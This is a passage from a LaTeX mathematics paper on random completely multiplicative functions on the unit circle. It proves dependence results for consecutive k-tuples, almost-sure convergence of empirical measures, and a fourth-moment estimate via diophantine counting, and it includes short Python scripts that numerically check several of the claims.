for $1 \leq A, B, C \leq k!$ squarefree, $-k < d_1, d_2 < k$, $d_1, d_2, d_1 - d_2 \neq 0$.
From these equations, we deduce, for $x = BC yz$:
$$x^2 = BC (At^2 + d_1)(At^2 + d_2).$$
The four roots of the right-hand side are the square roots of $-d_1/A$ and $-d_2/A$, which are all distinct since $d_1 \neq d_2$, $d_1 \neq 0$, $d_2 \neq 0$. Again by Baker's result, one deduces that the solutions are explicitly bounded, which then gives an explicit bound for $n$.
The remaining case is when exactly two of the $m_j$'s are non-zero, with $\rho_j = 2$, and then $m_j = q/2$.
The dependence modulo $q$ then means that
$(n+j)(n+j')$ is a square for distinct $j, j'$ between $1$ and $k$, which implies that
$(n+j)/g$ and $(n+j')/g$ are both squares
where $g = \operatorname{gcd}(n+j, n+j')$.
These squares have difference smaller than $k$, which implies that they are smaller than $k^2$. Moreover, $g$ divides $|j-j'| \leq k$, and then $g \leq k$, which gives $n \leq k^3$.
\end{proof}
Here, we explicitly solve a particular case:
\begin{proposition}
For $q = 2$, $(X_{n+1}, \dots, X_{n+5})$ are independent for all $n \geq 2$ and not for $n=1$.
\end{proposition}
\begin{proof}
A dependence means that there exists a product
of distinct non-square factors among $n+1, \dots, n+5$ which is a square.
For a prime $p \geq 5$, at most one $p$-adic valuation is non-zero, which implies that all the $p$-adic valuations are even.
Hence, the factors involved in the product are all squares multiplied by $2, 3$ or $6$. Since they differ by at most $4$, no two of them can lie in the same of these three ``categories'', which implies, since the product is a square, that there exist three numbers, respectively of the form $2x^2$, $3y^2$, $6z^2$, in the interval between $n+1$ and $n+5$. Now, Hajdu and Pint\'er \cite{HP} have determined all the triples of distinct integers in intervals of length at most 12 whose product is a square. For length $5$, the only positive triple is $(2,3,6)$, which implies that the only dependence in the present setting is $X_2 X_3 X_6 = 1$.
\end{proof}
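For $q = 2$, the dependence condition is concrete: some product of distinct non-square integers among $n+1, \dots, n+5$ must be a perfect square. A direct search (a sketch; the proposition above is what rules out larger values of $n$) finds only $n = 1$, through $2 \cdot 3 \cdot 6 = 36$:

```python
from math import isqrt
from itertools import combinations

def is_square(m):
    r = isqrt(m)
    return r * r == m

def has_square_subset_product(n, k=5):
    """True iff some product of at least two distinct non-squares
    among n+1, ..., n+k is a perfect square."""
    nonsquares = [n + j for j in range(1, k + 1) if not is_square(n + j)]
    for size in range(2, len(nonsquares) + 1):
        for combo in combinations(nonsquares, size):
            p = 1
            for x in combo:
                p *= x
            if is_square(p):
                return True
    return False

hits = [n for n in range(1, 2001) if has_square_subset_product(n)]
print(hits)  # [1]
```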
\begin{remark}
The list given in \cite{HP} shows that for $q = 2$, there are dependences for quite large values of $n$ as soon as $k \geq 6$. For example,
we have $X_{240} X_{243} X_{245} = 1$ for $k =6$ and $X_{10082}X_{10086}X_{10092} = 1$ for $k = 11$.
\end{remark}
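Both products mentioned in the remark are indeed perfect squares, which, for $q = 2$, forces the corresponding relations between the $X_n$'s. A quick check:

```python
from math import isqrt

# Both triples from the remark have a product which is a perfect square.
checks = {}
for triple in [(240, 243, 245), (10082, 10086, 10092)]:
    p = triple[0] * triple[1] * triple[2]
    checks[triple] = (isqrt(p) ** 2 == p)
print(checks)  # both values True
```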
\section{Convergence of the empirical measure in the uniform case} \label{uniform2}
In this section, $(X_p)_{p \in \mathcal{P}}$ are uniform on the unit circle, and $k \geq 1$ is a fixed integer. For $N \geq 1$, we consider the empirical measure of the $N$ first $k$-uples:
$$\mu_{k,N} := \frac{1}{N}\sum_{n=1}^N
\delta_{(X_{n+1}, \dots X_{n+k})}.$$
It is reasonable to expect that $\mu_{k,N}$ tends to the uniform distribution on $\mathbb{U}^k$, which is the common distribution of
$(X_{n+1}, \dots X_{n+k})$ for all but finitely many values of $n$.
In order to prove this result, we will estimate the second moment of the Fourier transform of $\mu_{k,N}$, given by
$$\hat{\mu}_{k,N}(m_1, \dots, m_k)
= \int_{\mathbb{U}^k} \prod_{j=1}^k
z_j^{m_j} d\mu_{k,N} (z_1, \dots, z_k).$$
\begin{proposition} \label{momentorder2}
Let $m_1, \dots, m_k$ be integers, not all
equal to zero. Then, for all $N > N' \geq 0$,
$$\mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
\leq k (N-N') $$
and there exists $C_{m_1, \dots, m_k} \geq 0$, independent of $N$ and $N'$, such that
$$N-N' \leq \mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
\leq N - N' + C_{m_1, \dots, m_k}.$$
Moreover, under the same assumption,
$$\mathbb{E} \left[ |\hat{\mu}_{k,N}(m_1, \dots, m_k)|^2
\right] \leq \frac{k}{N},$$
$$\frac{1}{N} \leq \mathbb{E} \left[ |\hat{\mu}_{k,N}(m_1, \dots, m_k)|^2
\right] \leq \frac{1}{N} + \frac{C_{m_1, \dots, m_k}}{N^2}.$$
Finally, for $k \in \{1,2\}$, one can take
$C_{m_1}$ or $C_{m_1, m_2}$ equal to $0$,
and for $k = 3$, one can take
$C_{m_1, m_2,m_3} = 2$ if $(m_1,m_2,m_3)$ is proportional to $(2,1,-4)$ and $C_{m_1,m_2,m_3} = 0$ otherwise.
\end{proposition}
\begin{proof}
We have, using the completely multiplicative extension of $X_r$ to all $r \in \mathbb{Q}_+^*$:
$$\mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
= \sum_{N' < n_1, n_2 \leq N}
\mathbb{E} \left[X_{\prod_{j=1}^{k}
(n_1 + j)^{m_j} / (n_2 + j)^{m_j} } \right],$$
and then this second moment is equal to the number of pairs $(n_1, n_2)$
in $\{N'+1, \dots, N\}^2$ such that
\begin{equation}\prod_{j=1}^k (n_1 + j)^{m_j}
= \prod_{j=1}^k (n_2 + j)^{m_j}.
\label{n1n2}
\end{equation}
The number of trivial solutions $n_1 = n_2 $ of this equation is equal to $N - N'$, which gives a lower bound on the second moment we have to estimate.
On the other hand, the derivative of the rational fraction $\prod_{j=1}^k (X + j)^{m_j}$ can be written as the product of $\prod_{j=1}^k (X + j)^{m_j - 1}$, which is strictly positive on $\mathbb{R}_+$, by the
polynomial
$$Q(X) = \prod_{j=1}^k (X+j) \left[
\sum_{j=1}^k \frac{m_j}{X + j} \right].$$
The polynomial $Q$ has degree at most $k-1$ and is non-zero, since $(m_1, \dots, m_k)
\neq (0, \dots, 0)$ and then $\prod_{j=1}^k
(X+j)^{m_j}$ is non-constant.
We deduce that $Q$ has at most $k-1$ zeros, and then on $\mathbb{R}_+$, $\prod_{j=1}^k (X+j)^{m_j}$ is strictly monotonic on each of at most $k$ intervals of $\mathbb{R}_+$, whose bounds are $0$, the positive zeros of $Q$ and $+\infty$. Hence, for each choice of $n_1$, there are at most $k$ values of $n_2$
satisfying \eqref{n1n2}, i.e. at most one in each interval, which gives the upper bound $k(N-N')$ for the moment we are estimating.
Moreover, since $\prod_{j=1}^k (X+j)^{m_j}$ is strictly monotonic on an interval
of the form $[A, \infty)$ for some $A > 0$, we deduce that for any non-trivial
solution $(n_1,n_2)$ of \eqref{n1n2}, the minimum of $n_1$ and $n_2$ is at most $A$.
Hence, there are finitely many possibilities for the common value of the two sides of
\eqref{n1n2}, and for each of these values, at most $k$ possibilities for $n_1$ and for $n_2$. Hence, for fixed $(m_1, \dots, m_k)$, the total number of non-trivial solutions of \eqref{n1n2} is finite, which gives the bound $N-N'+ C_{m_1, \dots, m_k}$ of the proposition.
The statement involving the empirical measure is deduced by taking $N' = 0$ and by dividing everything by $N^2$.
The claim for $k \leq 3$ is an immediate consequence of the following statement we will prove now: the only integers $n_1 > n_2 \geq 1$, $(m_1,m_2,m_3) \neq (0,0,0)$,
such that \begin{equation}
(n_1+1)^{m_1} (n_1+2)^{m_2}
(n_1+3)^{m_3} = (n_2+1)^{m_1} (n_2+2)^{m_2}
(n_2+3)^{m_3} \label{n1n22}
\end{equation}
are $n_1 = 7$, $n_2 = 2$, $(m_1,m_2,m_3)$ proportional to $(2,1,-4)$, which corresponds to the equality: $$
8^2 \cdot 9 \cdot 10^{-4} = 3^2 \cdot 4 \cdot 5^{-4}.$$
If $m_1, m_2, m_3$ have the same sign and are not all zero, $(n+1)^{m_1}(n+2)^{m_2}
(n+3)^{m_3}$ is strictly monotonic in $n \geq 1$, and then we cannot get a solution of \eqref{n1n22} with $n_1 > n_2$.
By changing all the signs if necessary, we may assume that one of the integers $m_1, m_2,m_3$ is strictly negative and the others are nonnegative. For $n \geq 1$,
the fraction obtained by writing
$(n+1)^{m_1}(n+2)^{m_2}
(n+3)^{m_3}$ can only be simplified by prime
factors dividing two of the integers $n+1, n+2, n+3$, and then only by a power of $2$.
If $m_2 < 0$ and then $m_1, m_3 \geq 0$, the numerator and the denominator have different parity, and then the fraction is irreducible for all $n$: we do not get any solution of \eqref{n1n22} in this case.
Otherwise, $m_1$ or $m_3$ is strictly negative. If $(n_1, n_2)$ solves \eqref{n1n22}, let us define $s := 1$ and $j := n_2 + 1$ if $m_1 < 0$, and $s := -1$ and $j := n_2 + 3$ if $m_3 < 0$.
The denominators of the two fractions corresponding to the two sides of \eqref{n1n22} are respectively a power of
$j$ and the same power of $n_1 + 2 - s$: if \eqref{n1n22} is satisfied, these denominators should differ only by a power of $2$, since the fractions can be only simplified by such a power.
Hence, $n_1 + 2 - s = 2^{\ell} j$ for some $\ell \geq 0$, and by looking at the numerators of the fractions, we deduce that there exists $r \geq 0$ such that
$$2^r (j+s)^{m_2} (j+2s)^{m_{2 + s}}
= (2^{\ell}j+s)^{m_2} (2^{\ell}j+2s)^{m_{2 + s}}.$$
If $\ell \geq 2$, the ratios
$(2^{\ell}j+s)/(j+s)$ and
$(2^{\ell}j+2s)/(j+2s)$ are at least
$(4\cdot2 + 2)/(2 + 2) = 5/2$ since $j \geq n_2 +1 \geq 2$ and $|2s| \leq 2$, and then
the ratio between the right-hand side
and the left-hand side of the previous equality is at least $(5/2)^{m_{2 + s} + m_2} 2^{-r}$,
which gives
$$ 2^r \geq (5/2)^{m_{2 + s} + m_2}.$$
On the other hand, the $2$-adic valuation
of the right-hand side is $m_{2+s}$ since
$2^{\ell} j + 2s \equiv 2$ modulo $4$, whereas the valuation of the left-hand side is at least $r$, which gives
$$ 2^r \leq 2^{m_{2+s}}.$$
We then get a contradiction for $\ell \geq 2$, except in the case $m_{2+s} = m_2 = 0$,
where we already know that there is no solution of \eqref{n1n22}.
If $\ell = 1$, we get
$$2^r (j+s)^{m_2} (j+2s)^{m_{2 + s}}
= (2j+s)^{m_2} (2j+2s)^{m_{2 + s}}.$$
In this case, the prime factors of $2j+s$, which are odd ($|s| = 1$), should divide $j+s$ or $j+2s$, then $2j+2s$ or $2j+4s$, and finally $s$ or $3s$. Hence, $2j+s$ is a power of $3$.
Similarly, the odd factors of $j+2s$, and then of $2j + 4s$, should divide $2j+s$ or $2j+2s$, and then $s$ or $3s$: $2j+4s$ is the product of a power of $2$ and a power of $3$.
If we write $2j+s = 3^a$, $2j + 4s = 2^b 3^c$, we must have $|3^a - 2^b 3^c| = 3$.
If $a \leq 1$, we have $2j + s \leq 3$. If $s = 1$, we get $n_2 + 1 = j \leq 1$, and if $s = -1$, we get $n_2 + 3 = j \leq 2$, which is impossible.
If $a \geq 2$, $3^a$ is divisible by $9$, and then $2^b 3^c$ is congruent to $3$ or $6$ modulo $9$, which implies $c = 1$, and then $|3^{a-1} - 2^b| = 1$. Now, by induction, one proves that the order of $2$ modulo $3^{a-1}$ is equal to $2.3^{a-2}$ (i.e. $2$ is a primitive root modulo the powers of $3$), and this order should divide $2b$, which implies that $b \geq 3^{a-2}$ ($b = 0$ is not possible) and then
$2^{3^{a-2}} \leq 3^{a-1} + 1$, which implies $a \in \{2,3\}$.
If $a = 2$ and $s = 1$, we get $2j+1 = 9$,
$j= 4$, and then $n_1 = 7$, $n_2 = 3$.
We should solve $4^{m_1} 5^{m_2} 6^{m_3} =
8^{m_1} 9^{m_2} 10^{m_3}$. Taking the $3$-adic valuation gives $m_3 = 2 m_2$, taking the $5$-adic valuation gives $m_3 = m_2$, and then $m_2 = m_3 = 0$, which implies $m_1 = 0$.
If $a = 2$ and $s = -1$, we get $2j - 1 = 9$, $j=5$, $n_1 = 7$, $n_2 = 2$, which gives the equation $3^{m_1} 4^{m_2} 5^{m_3} =
8^{m_1} 9^{m_2} 10^{m_3}$.
Taking the $2$-adic valuation gives $2m_2 = 3m_1 + m_3$, taking the $3$-adic valuation gives $m_1 = 2 m_2$, and then $(m_1,m_2,m_3)$ should be proportional to $(2,1,-4)$: in this case, we get one of the solutions already mentioned.
If $a = 3$, $2^b$ should be $8$ or $10$, and then $b = 3$, $2j+ s = 27$, $2j + 4s = 24$, $j = 14$, $s = -1$, $n_1 = 25$, $n_2 = 11$. We have to solve $12^{m_1} 13^{m_2} 14^{m_3} = 26^{m_1} 27^{m_2} 28^{m_3}$.
Taking the $3$-adic valuation gives $m_1 = 3m_2$, taking the $13$-adic valuation gives $m_1 = m_2$, and then $m_1 = m_2 = m_3 = 0$.
\end{proof}
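The classification just proven can be cross-checked by a small exhaustive search over $n$ and bounded exponents, screening candidates with floating-point logarithms and confirming them with exact rational arithmetic. A sketch (solutions are sign-normalized so that each one is counted once; the bounds $n_1 \leq 40$ and $|m_j| \leq 5$ are arbitrary):

```python
from fractions import Fraction
from itertools import product
from math import log

N_MAX, M_MAX = 40, 5
logs = {n: log(n) for n in range(2, N_MAX + 4)}

def exact_value(n, m):
    """(n+1)^{m_1} (n+2)^{m_2} (n+3)^{m_3}, exactly."""
    return (Fraction(n + 1) ** m[0] * Fraction(n + 2) ** m[1]
            * Fraction(n + 3) ** m[2])

solutions = set()
for m in product(range(-M_MAX, M_MAX + 1), repeat=3):
    if m == (0, 0, 0) or next(x for x in m if x) < 0:
        continue  # skip the zero tuple; normalize the overall sign
    # sort the (approximate) log-values and inspect nearly-equal pairs
    vals = sorted((m[0] * logs[n + 1] + m[1] * logs[n + 2]
                   + m[2] * logs[n + 3], n) for n in range(1, N_MAX + 1))
    for i, (v1, n1) in enumerate(vals):
        for v2, n2 in vals[i + 1:]:
            if v2 - v1 > 1e-9:
                break
            if exact_value(n1, m) == exact_value(n2, m):
                solutions.add((min(n1, n2), max(n1, n2), m))
print(solutions)  # {(2, 7, (2, 1, -4))}
```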
\begin{corollary}
For all $(m_1, \dots, m_k) \in \mathbb{Z}^k$, $\hat{\mu}_{k,N}(m_1, \dots, m_k)$ converges
in $L^2$, and then in probability, to $\mathds{1}_{m_1 = \dots = m_k = 0}$, i.e. to the corresponding Fourier coefficient of the uniform distribution $\mu_{k}$ on $\mathbb{U}^k$. In other words, $\mu_{k,N}$ converges weakly in probability to $\mu_{k}$.
\end{corollary}
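Proposition \ref{momentorder2} can also be illustrated numerically: for $k = 2$ and $(m_1, m_2) = (1,1)$, the second moment of $\sum_{n \leq N} X_{n+1} X_{n+2}$ is exactly $N$. A Monte Carlo sketch (with a fixed seed; the tolerance must be loose, since single realizations of $|S_N|^2$ fluctuate):

```python
import cmath
import random

N = 100  # number of terms in the sum

def smallest_prime_factors(limit):
    spf = list(range(limit + 1))
    for p in range(2, int(limit ** 0.5) + 1):
        if spf[p] == p:
            for q in range(p * p, limit + 1, p):
                if spf[q] == q:
                    spf[q] = p
    return spf

spf = smallest_prime_factors(N + 2)
primes = [p for p in range(2, N + 3) if spf[p] == p]

def X_of(n, xp):
    """Value at n of the completely multiplicative function X."""
    val = complex(1.0)
    while n > 1:
        val *= xp[spf[n]]
        n //= spf[n]
    return val

random.seed(0)
trials, total = 800, 0.0
for _ in range(trials):
    xp = {p: cmath.exp(2j * cmath.pi * random.random()) for p in primes}
    s = sum(X_of(n + 1, xp) * X_of(n + 2, xp) for n in range(1, N + 1))
    total += abs(s) ** 2
estimate = total / trials / N
print(round(estimate, 2))  # close to 1
```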
In this setting, we also have a strong law of large numbers, with an estimate of the
rate of convergence, for sufficiently smooth test functions. Before stating the corresponding result, we will show the following lemma, which will be useful:
\begin{lemma} \label{lemmaLLN}
Let $\epsilon > \delta \geq 0$, $C > 0$, and let $(A_n)_{n \geq 0}$ be a sequence of
random variables such that $A_0 = 0$ and
for all $N > N' \geq 0$,
$$\mathbb{E}[|A_{N} - A_{N'}|^2]
\leq C (N-N')N^{2 \delta}.$$
Then, almost surely, $A_N = O(N^{1/2 + \epsilon})$: more precisely, we have for $M > 0$,
$$\mathbb{P} \left(\sup_{N \geq 1}
|A_N|/(N^{1/2 + \epsilon}) \geq M
\right) \leq K_{\epsilon, \delta} C M^{-2},$$
where $K_{\epsilon, \delta} > 0$ depends
only on $\delta$ and $\epsilon$.
\end{lemma}
\begin{proof}
For $\ell, q \geq 0$, $M > 0$ and $\epsilon' := (\delta + \epsilon)/2
\in (\delta, \epsilon)$, we have:
\begin{align*}\mathbb{P} \left(|A_{(2\ell + 1).2^q} -
A_{(2\ell).2^q}| \geq M [(2\ell + 1).2^q]^{1/2 + \epsilon'} \right)
& \leq M^{-2} [(2\ell + 1).2^q]^{-1 -2 \epsilon'}
\mathbb{E} \left[|A_{(2\ell + 1).2^q} -
A_{(2\ell).2^q}|^2\right]
\\ & \leq M^{-2}.C.2^q.[(2\ell + 1).2^q]^{2 \delta -1 -2 \epsilon'}
\\ & \leq M^{-2}.C.2^{-2q (\epsilon' - \delta)}
(2\ell + 1)^{-1 - 2 (\epsilon' - \delta)}.
\end{align*}
Since $\epsilon' > \delta$, we deduce that,
with probability at least $1 - D CM^{-2}$, none of the events above occurs, where $D$ depends only on $\epsilon'$ and $\delta$, and then only on $\delta$ and $\epsilon$.
In this case, we have
$$ |A_{(2\ell + 1).2^q} -
A_{(2\ell).2^q}| \leq M [(2\ell + 1).2^q]^{1/2 + \epsilon'}$$
for all $\ell, q \geq 0$.
Now, if we take the binary expansion $N = \sum_{j=0}^{\infty} \delta_j
2^j$
with $\delta_j \in \{0,1\}$, and if $N_r
= \sum_{j=r}^{\infty} \delta_j 2^j$ for all $r \geq 0$, we get $|A_{N_r} - A_{N_{r+1}}|
= 0$ if $\delta_r = 0$, and
\begin{align*} |A_{N_r} - A_{N_{r+1}}|
& = |A_{2^r (2 (N_{r+1}/2^{r+1}) + 1)}
- A_{2^r (2 N_{r+1}/2^{r+1})}|
\\ & \leq M[2^r (2( N_{r+1}/2^{r+1}) + 1)]^{1/2 + \epsilon'}
= M (N_r)^{1/2 + \epsilon'} \leq M N^{1/2 + \epsilon'}
\end{align*}
if $\delta_r = 1$. Adding these inequalities from $r = 0$ to $\infty$, we deduce that $|A_N| \leq M \mu(N) N^{1/2
+ \epsilon'}$, where $\mu(N)$ is the number of $1$'s in the binary expansion of $N$. Hence,
$$|A_N| \leq M \left(1 + (\log N/\log 2)
\right) N^{1/2 + \epsilon'}
< B M N^{1/2 + \epsilon} ,$$
where $B > 0$ depends only on $\epsilon'$ and $\epsilon$ (recall that $\epsilon > \epsilon'$), and then only on $\delta$ and $\epsilon$.
We then have, for $M' := BM$:
$$\mathbb{P} \left(\exists N \geq 1,
|A_N| \geq M' N^{1/2 + \epsilon} \right)
\leq D C M^{-2} = D C B^{2} (M')^{-2},$$
which gives the desired result after replacing $M'$ by $M$.
\end{proof}
From this lemma, we deduce the following:
\begin{proposition}
Almost surely, $\mu_{k,N}$ weakly converges to $\mu_k$. More precisely, the following holds with probability one: for all $u > k/2$, for all continuous functions $f$ from
$\mathbb{U}^k$ to $\mathbb{C}$ such that
$$\sum_{m \in \mathbb{Z}^k} |\hat{f}(m)|
\, ||m||^{u} < \infty,$$
$|| \cdot ||$ denoting any norm on
$\mathbb{R}^k$,
and for all $\epsilon > 0$,
$$\int_{\mathbb{U}^k} f d \mu_{k,N}
= \int_{\mathbb{U}^k} f d \mu_{k}
+ O(N^{-1/2 + \epsilon}).$$
\end{proposition}
\begin{remark}
By the Cauchy-Schwarz inequality, we have
$$\sum_{m \in \mathbb{Z}^k}
|\hat{f}(m)| (1+||m||)^{u}
\leq \left(\sum_{m \in \mathbb{Z}^k}
|\hat{f}(m)|^2 (1 + ||m||)^{4u} \right)^{1/2}
\left(\sum_{m \in \mathbb{Z}^k}
(1+||m||)^{- 2u} \right)^{1/2},$$
which implies that the assumption on $f$ given in the proposition is satisfied for all $f$ in the Sobolev space $H^s$ as soon
as $s > k$.
Unfortunately, the proposition does not apply if $f$ is a product of indicators of arcs. The weak convergence implies that
$$\int_{\mathbb{U}^k} f d\mu_{k,N} \underset{N \rightarrow \infty}{\longrightarrow}
\int_{\mathbb{U}^k} f d\mu_{k} $$
even in this case, but we don't know at which rate this convergence occurs.
\end{remark}
\begin{proof}
From Proposition \ref{momentorder2}, and
Lemma \ref{lemmaLLN} applied to $\epsilon > 0$, $\delta = 0$ and
$$A_N := N \hat{\mu}_{k,N} (m),$$
we get, for all $m \in \mathbb{Z}^k \backslash \{0\}$,
$M > 0$,
$$\mathbb{P} \left(\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/N^{-1/2 + \epsilon} \geq M
\right) \leq k K_{\epsilon, 0} M^{-2}.$$
In particular, almost surely,
$$\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/(N^{-1/2 + \epsilon}
||m||^u) < \infty$$
for all $m \in \mathbb{Z}^k \backslash \{0\}$, $\epsilon > 0$, $u > k/2$.
Moreover,
$$\mathbb{P} \left(\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/N^{-1/2 + \epsilon} \geq ||m||^{u} \right) \leq
k K_{\epsilon, 0} ||m||^{- 2u}.$$
Since $- 2u < -k$, we deduce, by the Borel-Cantelli lemma, that almost surely,
for all $\epsilon > 0$, $u > k/2$,
$$\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/(N^{-1/2 + \epsilon}
||m||^u) \leq 1$$
for all but finitely many $m \in \mathbb{Z}^k \backslash \{0\}$. Therefore, almost surely, for all $\epsilon > 0$, $u > k/2$,
$$\sup_{m \in \mathbb{Z}^k \backslash \{0\}}
\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/(N^{-1/2 + \epsilon}
||m||^u) < \infty$$
i.e.
$$\hat{\mu}_{k,N} (m)
= O(N^{-1/2 + \epsilon} ||m||^u)$$
for $m \in \mathbb{Z}^k \backslash \{0\}$, $N \geq 1$.
Let us now assume that this almost sure property holds, and let $f$ be a function
satisfying the assumptions of the proposition. Since the Fourier coefficients of $f$ are summable (i.e. $f$ is in the Wiener algebra of $\mathbb{U}^k$), the corresponding Fourier series converges uniformly to a function which is necessarily equal to $f$, since it has the same Fourier coefficients. We can then
write:
$$f(z_1, \dots, z_k) =
\sum_{m_1, \dots, m_k \in \mathbb{Z}}
\hat{f}(m_1, \dots, m_k) \prod_{j=1}^k
z_j^{m_j},$$
which implies
$$\int_{\mathbb{U}^k} f d\mu_{k,N}
= \sum_{m \in \mathbb{Z}^k}
\hat{f}(m)
\hat{\mu}_{k,N} (m)
= \int_{\mathbb{U}^k} f d\mu_{k}
+ \sum_{m \in \mathbb{Z}^k \backslash \{0\}}
\hat{f}(m)
\hat{\mu}_{k,N} (m).$$
Now, if $u > k/2$ is chosen so that the assumption on $f$ holds, the last sum is dominated by
$$N^{-1/2 + \epsilon} \sum_{m \in \mathbb{Z}^k}
|\hat{f}(m)| \, ||m||^u,$$
which is finite by assumption, and hence $O(N^{-1/2 + \epsilon})$.
\end{proof}
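The Fourier-expansion step at the end of this proof admits a quick numerical sanity check; the sketch below (our own illustration, with arbitrary sample points and $k = 1$) verifies the identity $\int f \, d\mu_N = \sum_m \hat{f}(m) \hat{\mu}_N(m)$ for a trigonometric polynomial:

```python
import cmath
import random

random.seed(1)
N = 500
# empirical measure mu_N of N arbitrary points on the unit circle
z = [cmath.exp(2j * cmath.pi * random.random()) for _ in range(N)]

fhat = {-2: 1.0, 0: 3.0, 1: 2.0}       # Fourier coefficients of f
f = lambda w: sum(c * w ** m for m, c in fhat.items())

lhs = sum(f(w) for w in z) / N          # integral of f against mu_N
mu_hat = lambda m: sum(w ** m for w in z) / N
rhs = sum(c * mu_hat(m) for m, c in fhat.items())
assert abs(lhs - rhs) < 1e-9            # the two sides agree up to rounding
```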
\section{Moments of order different from two} \label{moments}
Since we have a law of large numbers for
$\mu_{k,N}$, with a rate of decay of order $N^{-1/2+ \epsilon}$, it is natural to ask whether a central limit theorem holds.
One possible approach consists in studying the moments of sums over $n$ of products of the variables $X_{n+1}, \dots, X_{n+k}$.
For the sums $\sum_{n=1}^N X_n$, it seems very likely that there is no convergence to a Gaussian random variable after normalization. Indeed, the second moment of the absolute value of the renormalized sum $\frac{1}{\sqrt{N}} \sum_{n=1}^N X_n$
is equal to $1$, so if this variable converged to a standard complex Gaussian variable, we would need to have
$$\mathbb{E} \left[\frac{1}{\sqrt{N}}\left|\sum_{n=1}^N
X_n \right| \right] \underset{N \rightarrow \infty}{\longrightarrow}
\frac{\sqrt{\pi}}{2}.$$
There are (at least) two contradictory conjectures about the behavior of this first moment: a conjecture by Helson \cite{H}, saying that it should tend to $0$, and a conjecture by Heap and Lindqvist \cite{HL}, saying that it should tend to an explicit constant, approximately $0.8769$, i.e. close to, but slightly smaller than, $\sqrt{\pi}/2$. In \cite{HL}, the authors show that the upper limit of the moment is smaller than $0.904$, whereas
in \cite{HNR}, Harper, Nikeghbali and Radziwi\l\l{} prove that the first moment decays at most like $(\log \log N)^{-3 + o(1)}$; they also conjecture that the moment tends to a non-zero constant.
Equivalents of the moments of even order are computed in \cite{HNR} and \cite{HL}, and these moments are not bounded with respect to $N$: the moment of order $2p$ is equivalent to an explicit constant times $(\log N)^{(p-1)^2}$.
In the case of sums different from $\sum_{n=1}^N X_n$, the moment computations involve arithmetic problems of a different nature. Here, we will study the example of the fourth moment of the absolute value of
$ \sum_{n=1}^N X_n X_{n+1}$; notice that the second moment is clearly equal to $N$.
We have the following result:
\begin{proposition}
We have
$$\mathbb{E}\left[ \left|\sum_{n=1}^N
X_n X_{n+1} \right|^4 \right]
= 2N^2 - N + 8 \mathcal{N}(N)
+ 4 \mathcal{N}_{=} (N),$$
where $\mathcal{N}(N)$ (resp. $\mathcal{N}_{=}(N)$) is the number of solutions of the diophantine equation
$a(a+1)d(d+1) = b(b+1)c(c+1)$ such that
the integers $a, b, c, d$ satisfy
$0 < a < b < c <d \leq N$ (resp. $0 < a < b = c < d \leq N$). Moreover, for all $\epsilon > 0$, there exists
$C_{\epsilon} > 0$, independent of $N$, such that for all $N \geq 8$,
$$ N/2 \leq 8 \mathcal{N}(N)
+ 4 \mathcal{N}_{=} (N) \leq C_{\epsilon} N^{3/2 + \epsilon}.$$
Hence,
$$\mathbb{E}\left[ \left|\sum_{n=1}^N
X_n X_{n+1} \right|^4 \right]
= 2N^2 + O_{\epsilon} (N^{3/2 + \epsilon}).$$
\end{proposition}
\begin{proof}
Expanding the fourth moment, we immediately obtain that
it is equal to the total number of solutions of the previous diophantine equation, with
$a, b, c, d \in \{1,2, \dots, N\}$.
One has $2N^2 - N$ trivial solutions: $N(N-1)$ for which $a = c\neq b = d$, $N(N-1)$ for which $a = b \neq c = d$, $N$ for which $a = b = c = d$. It remains to count the number of non-trivial solutions.
Such a solution has a minimal element among $a, b, c, d$, and this element is unique: if the minimum were attained twice on the same side of the equation, then necessarily $a = b = c = d$; if it were attained once on each side, then the two remaining elements would have to be equal, which also gives a trivial solution.
Dividing the number of non-trivial solutions by four, we can assume that $a$ is the unique smallest integer, which implies that $d$ is the largest one. For $b = c$, we get $\mathcal{N}_= (N)$ solutions, and for
$b \neq c$, we get $2 \mathcal{N} (N)$
solutions, the factor $2$ coming from the possible exchange between $b$ and $c$.
The lower bound $N/2$ comes from the solutions $(1,3,3,8)$ and $(1,2,5,9)$ for $8 \leq N \leq 24$, and from the solutions
of the form $(n,2n+1,3n,6n+2)$, $6n+2 \leq N$, for $N \geq 25$: each solution with $b = c$ (resp. $b < c$) contributes $4$ (resp. $8$) to $8 \mathcal{N}(N) + 4 \mathcal{N}_{=} (N)$.
Let us now prove the upper bound.
The odd integers $A = 2a + 1$, $B = 2b+1$, $C = 2c + 1$, $D = 2d + 1$ should satisfy:
$$(A^2 - 1)(D^2-1) = (B^2 - 1)(C^2 -1).$$
Since $B$ and $C$ are closer to each other than $A$ and $D$ are, we deduce
$$A^2 - 1+ D^2-1 > B^2 - 1 + C^2 - 1,$$
and then
$$\delta := (AD - BC)/2 > 0,$$
since
$$A^2 D^2 - B^2 C^2 = A^2 + D^2 - B^2 - C^2 > 0.$$
Note that $\delta$ is an integer. The last equation gives
$$4 \delta (AD - \delta) = A^2 + D^2
- (B-C)^2 - 2AD + 4 \delta,$$
and in particular
$$A^2 - 2(2 \delta +1) AD + D^2 + 4 \delta (\delta +1 ) = (B-C)^2 \geq 0.$$
If $1 < D/A \leq 2 \delta + 2$, we deduce
$$AD \left( \frac{1}{2 \delta + 2}
- 4 \delta - 2 + 2\delta + 2 \right) + 4 \delta(\delta +1) \geq 0,$$
and then
$$AD \leq \frac{4 \delta(\delta + 1)}{ 2\delta - (1/4)} = 2 (\delta +1)
\left(1 - \frac{1}{8 \delta} \right)^{-1}
\leq 2 (\delta + 1) \left( 1 + \frac{1}{7 \delta} \right) \leq 2 \delta + 2 + (4/7),
$$
$AD \leq 2 \delta +1$ since it is an odd integer, and then $BC = AD - 2 \delta \leq 1$, which gives a contradiction.
Any solution should then satisfy $D/A > 2\delta +2$.
For $\delta > \sqrt{N}$, we have necessarily $A < D /( 2\sqrt{N} + 2)
\leq (2N+1)/(2 \sqrt{N} + 2) = O(\sqrt{N})$, and then $a = O(\sqrt{N})$,
